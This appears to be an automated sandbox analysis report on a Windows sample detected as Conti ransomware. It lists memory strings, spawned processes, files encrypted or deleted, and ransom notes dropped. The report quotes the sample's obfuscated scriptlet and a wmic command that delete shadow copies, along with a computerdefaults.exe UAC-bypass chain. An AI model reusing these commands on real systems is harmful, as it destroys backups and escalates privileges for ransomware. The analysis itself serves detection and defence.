    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000000.250058237.00000255F5875000.00000004.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://az416426.vo.msecnd.net/scripts/a/ai.0.js
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://az725175.vo.msecnd.net/scripts/jsll-4.js
    Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
    Source: svchost.exe, 00000004.00000000.235490138.0000024844060000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
    Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmpString found in binary or memory: https://contextual.media.net/48/nrrV18753.js
    Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmpString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3
    Source: taskhostw.exe, 0000001E.00000002.494748580.00000255F57AB000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
    Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
    Source: taskhostw.exe, 0000001E.00000002.494889453.00000255F5824000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1:
    Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
    Source: taskhostw.exe, 0000001E.00000002.501026757.00000255FA0C0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1?
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
    Source: taskhostw.exe, 0000001E.00000002.499939128.00000255F9DE8000.00000008.00000001.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBEB4CB72
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Google
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UaGrENHsxJlGDuGo1OIlI3K.woff
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/googlesans/v16/4UabrENHsxJlGDuGo1OIlLU94bt3.woff
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOlCnqEu92Fr1MmEU9vAA.woff
    Source: taskhostw.exe, 0000001E.00000000.271559874.00000255F9DF0000.00000008.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com/s/roboto/v20/KFOmCnqEu92Fr1Me5g.woff
    Source: taskhostw.exe, 0000001E.00000000.271327220.00000255F9DB0000.00000008.00000001.sdmpString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
    Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7064439419818173&output=html&h=250&twa=
    Source: taskhostw.exe, 0000001E.00000002.498013543.00000255F9A98000.00000002.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/adview?ai=C4ZZc-r8UXcilEM6E-gaA-YLQCODD_YZVtLCoh4gJ8ui0tf
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DnuZ
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnv6
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Dnwt
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4DsDH
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmQ
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmV
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FBmZ
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4FGwC
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n1yl
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4n4cm
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJ7
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ncJa
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4nqTh
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4sQww?ver=37ff
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tD2S
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tG3O
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoW
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tIoY
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tKUA
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOD
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tMOM
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4tQVa
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4u1kF
    Source: taskhostw.exe, 0000001E.00000000.271226075.00000255F9D98000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ubMD
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
    Source: taskhostw.exe, 0000001E.00000002.499775324.00000255F9DB8000.00000002.00000001.sdmpString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
    Source: taskhostw.exe, 0000001E.00000000.270886887.00000255F9D70000.00000008.00000001.sdmpString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
    Source: taskhostw.exe, 0000001E.00000000.270886887.00000255F9D70000.00000008.00000001.sdmpString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
    Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
    Source: svchost.exe, 00000004.00000000.235585285.000002484407F000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
    Source: taskhostw.exe, 0000001E.00000002.500169147.00000255F9E20000.00000008.00000001.sdmp, taskhostw.exe, 0000001E.00000002.494972706.00000255F5867000.00000004.00000001.sdmp, taskhostw.exe, 0000001E.00000000.249181411.00000255F57AB000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601453683&rver=6.0.5286.0&wp=MBI_SSL&wre
    Source: svchost.exe, svchost.exe, 0000000B.00000002.495504372.0000020A025A0000.00000040.00000001.sdmp, taskhostw.exe, taskhostw.exe, 0000001E.00000002.500519852.00000255F9EB0000.00000040.00000001.sdmp, readme.txt.3.dr String found in binary or memory: https://www.torproject.org/

    Spam, unwanted Advertisements and Ransom Demands:

    Found ransom note / readme
    Source: C:\Users\Public\readme.txt Dropped file: <?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>
    Yara detected Conti ransomware
    Source: Yara match File source: Process Memory Space: svchost.exe PID: 3020, type: MEMORY
    Deletes shadow drive data (may be related to ransomware)
    Source: 7906dc47_by_Libranalysis.exe Binary or memory string: C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    Source: 7906dc47_by_Libranalysis.exe, 00000002.00000002.326052029.000001BB04C60000.00000040.00000001.sdmp Binary or memory string: http:// Software\Classes\ms-settings\shell\open\commandSoftware\Classes\mscfile\shell\open\commandDelegateExecuteC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"regsvr32.exe scrobj.dll /s /u /n /i:cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exeCompMgmtLauncher.exe<?XML version="1.0"?><scriptlet><registration progid="Pentest" classid="{F0001111-0000-0000-0000-0000FEEDACDC}"><script language="JScript"><![CDATA[var r = new ActiveXObject("W"+"Scr"+"ipt.S"+"he"+"ll").Run("vs"+"s"+"admi"+"n.e"+"x"+"e De"+"le"+"t"+"e S"+"ha"+"do"+"ws /a"+"ll /qu"+"ie"+"t");]]></script></registration></scriptlet>0123456789"./^&cmd /c "start http://
    Modifies existing user documents (likely ransomware behavior)
    Source: C:\Windows\System32\sihost.exe File moved: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx
    Source: C:\Windows\System32\sihost.exe File deleted: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx
    Source: C:\Windows\System32\sihost.exe File moved: C:\Users\user\Desktop\LSBIHQFDVT\SUAVTZKNFL.pdf
    Source: C:\Windows\System32\sihost.exe File deleted: C:\Users\user\Desktop\LSBIHQFDVT\SUAVTZKNFL.pdf
    Source: C:\Windows\System32\sihost.exe File moved: C:\Users\user\Desktop\LSBIHQFDVT.docx

    System Summary:

    Contains functionality to create processes via WMI
    Source: WMIC.exe, 00000009.00000002.241117986.00000232C5730000.00000004.00000020.sdmp Binary or memory string: C:\Windows\system32\C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"|
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB5710B6 NtAllocateVirtualMemory,
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB02490104
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB05820A16
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB05890A16
    Source: C:\Windows\System32\sihost.exe Code function: 3_2_0000024D2C410A16
    Source: C:\Windows\System32\svchost.exe Code function: 4_2_0000024843FF0A16
    Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000020A025A0A16
    Source: C:\Windows\System32\taskhostw.exe Code function: 30_2_00000255F9EB0A16
    Source: 7906dc47_by_Libranalysis.exe Static PE information: No import functions for PE file found
    Source: 7906dc47_by_Libranalysis.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: classification engine Classification label: mal100.rans.evad.winEXE@57/122@0/0
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe File created: C:\Users\Public\readme.txt
    Source: C:\Windows\System32\taskhostw.exe Mutant created: \Sessions\1\BaseNamedObjects\eltalkfzj
    Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: 7906dc47_by_Libranalysis.exe Virustotal: Detection: 42%
    Source: unknown Process created: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe 'C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe'
    Source: C:\Windows\System32\sihost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /c computerdefaults.exe
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\ComputerDefaults.exe Process created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
    Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeProcess created: unknown unknown
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exeProcess created: unknown unknown
    Source: C:\Windows\System32\sihost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\sihost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c '%SystemRoot%\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe''
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe C:\Windows\system32\wbem\wmic process call create 'cmd /c computerdefaults.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\Windows\system32\wbem\wmic.exe' process call create 'vssadmin.exe Delete Shadows /all /quiet'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults.exe
    Source: C:\Windows\System32\taskhostw.exeProcess created: unknown unknown
    Source: C:\Windows\System32\taskhostw.exeProcess created: unknown unknown
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: unknown unknown
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\System32\ComputerDefaults.exeProcess created: unknown unknown
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
    Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
    Source: Window Recorder Window detected: More than 3 window changes detected
    Source: C:\Windows\System32\ComputerDefaults.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations
    Source: 7906dc47_by_Libranalysis.exe Static PE information: Image base 0x140000000 > 0x60000000
    Source: 7906dc47_by_Libranalysis.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB572A7A push rcx; retf
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB572880 push rbp; iretd
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB573AFE pushfq ; ret
    Source: initial sample Static PE information: section name: .text entropy: 7.62659115899

    Persistence and Installation Behavior:

    Creates processes via WMI
    Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Windows\System32\ComputerDefaults.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe File created: C:\Users\Public\readme.txt
    Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\GAOBCVIQIJ\readme.txt
    Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\IPKGELNTQY\readme.txt
    Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\LSBIHQFDVT\readme.txt
    Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\NEBFQQYWPS\readme.txt
    Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Desktop\readme.txt
    Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\GAOBCVIQIJ\readme.txt
    Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\IPKGELNTQY\readme.txt
    Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\LSBIHQFDVT\readme.txt
    Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\NEBFQQYWPS\readme.txt
    Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Documents\readme.txt
    Source: C:\Windows\System32\sihost.exe File created: C:\Users\user\Downloads\readme.txt
    Source: C:\Windows\System32\sihost.exe File created: C:\Users\Public\readme.txt
    Source: C:\Windows\System32\svchost.exe File created: C:\Users\Public\readme.txt
    Source: C:\Windows\System32\taskhostw.exe File created: C:\Users\Public\readme.txt
    Source: C:\Windows\System32\ComputerDefaults.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_00007FF6AB572327 rdtsc
    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB058206B2 FindFirstFileExW,
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB058906B2 GlobalAlloc,FindFirstFileExW,
    Source: C:\Windows\System32\sihost.exe Code function: 3_2_0000024D2C4106B2 FindFirstFileExW,
    Source: C:\Windows\System32\svchost.exe Code function: 4_2_0000024843FF06B2 FindFirstFileExW,
    Source: C:\Windows\System32\svchost.exe Code function: 11_2_0000020A025A06B2 FindFirstFileExW,
    Source: C:\Windows\System32\taskhostw.exe Code function: 30_2_00000255F9EB06B2 FindFirstFileExW,
    Source: C:\Users\user\Desktop\7906dc47_by_Libranalysis.exe Code function: 2_2_000001BB0582016A CreateMutexW,GetVolumeInformationW,GetLogicalDriveStringsW,
    Source: sihost.exe, 00000003.00000000.230762461.0000024D2EE30000.00000002.00000001.sdmp, WMIC.exe, 00000009.00000002.243253123.00000232C7520000.00000002.00000001.sdmp, WMIC.exe, 0000000A.00000002.247040845.0000025ED6CC0000.00000002.00000001.sdmp, svchost.exe, 0000000B.00000002.497265670.0000020A02B40000.00000002.00000001.sdmp, WMIC.exe, 00000015.00000002.248951683.0000020D0FA10000.00000002.00000001.sdmp, WMIC.exe, 00000017.00000002.250850741.000001909DD20000.00000002.00000001.sdmp, WMIC.exe, 0000001C.00000002.266576402.0000026D07D60000.00000002.00000001.sdmp, WMIC.exe, 0000001F.00000002.271124084.000002599F830000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: taskhostw.exe, 0000001E.00000000.249503673.00000255F5824000.00000004.00000001.sdmp Binary or memory string: 1&dispvertres=1024&isu=0&lo=663559&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663559&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
    Source: ComputerDefaults.exe, 00000021.00000002.266558256.000001E991F33000.00000004.00000020.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}\8
